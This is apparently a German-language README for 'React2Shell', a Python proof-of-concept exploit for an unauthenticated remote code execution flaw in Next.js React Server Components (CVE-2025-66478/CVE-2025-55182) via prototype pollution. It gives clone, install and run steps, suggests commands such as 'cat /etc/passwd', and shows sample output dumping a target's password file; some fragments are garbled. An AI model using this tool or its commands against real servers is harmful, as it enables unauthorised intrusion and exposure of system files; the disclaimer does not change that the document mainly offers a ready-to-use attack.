
React2Shell (CVE-2025-66478): Ein Python-basiertes Proof of Concept für kritische Remote Code Execution (RCE) in Next.js Server Components. Bietet interaktive CLI, benutzerdefinierte Payload-Injektion und sauberere Ausgabeformatierung. Nur für Bildungs- und Forschungszwecke.
Next.js Remotecodeausführung (RCE) über Prototype Pollution in Server Components
Dieses Repository enthält einen Proof of Concept (PoC) für CVE-2025-66478 (in manchen Kontexten auch als CVE-2025-55182 referenziert), eine kritische Schwachstelle, die Next.js-Anwendungen betrifft, die bestimmte Versionen von React Server Components (RSC) verwenden.
Durch Manipulation des Serialisierungsprozesses von RSCs kann ein nicht authentifizierter Angreifer einen schädlichen Payload über Prototype Pollution (__proto__:then) injizieren. Dies kann zur Ausführung beliebiger Systembefehle auf dem Server über child_process.execSync führen.
Entwickelt von: ArkhamKnight47
multipart/form-data-Payload.1:E{"digest":...}).\n vs \r\n) für saubere Ausgabe auf Windows- und Linux-Zielen.requests-Bibliothek# Clone the repository
git clone https://github.com/RavinduRathnayaka/CVE-2025-55182-PoC.git
cd CVE-2025-55182-PoC
# Install dependencies
pip install requests
python CVE-2025-66478.py
Sie werden aufgefordert:
http://localhost:3000id, whoami, cat /etc/passwd[?] TARGET URL > http://192.168.1.5:3000
[?] COMMAND > cat /etc/passwd
[*] EXECUTING EXPLOIT...
[+] PAYLOAD SUCCESSFUL. OUTPUT BELOW:
============================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
============================================================
Dieses Tool wird ausschließlich zu Bildungs- und Sicherheitsforschungszwecken bereitgestellt.
Der Autor (ArkhamKnight47) übernimmt keine Verantwortung für die missbräuchliche Verwendung dieses Codes. Das Testen dieses Exploits gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung zum Testen haben, ist illegal und unethisch.
Verantwortungsvoll nutzen. Ethisch lernen. Ihren Stack sichern.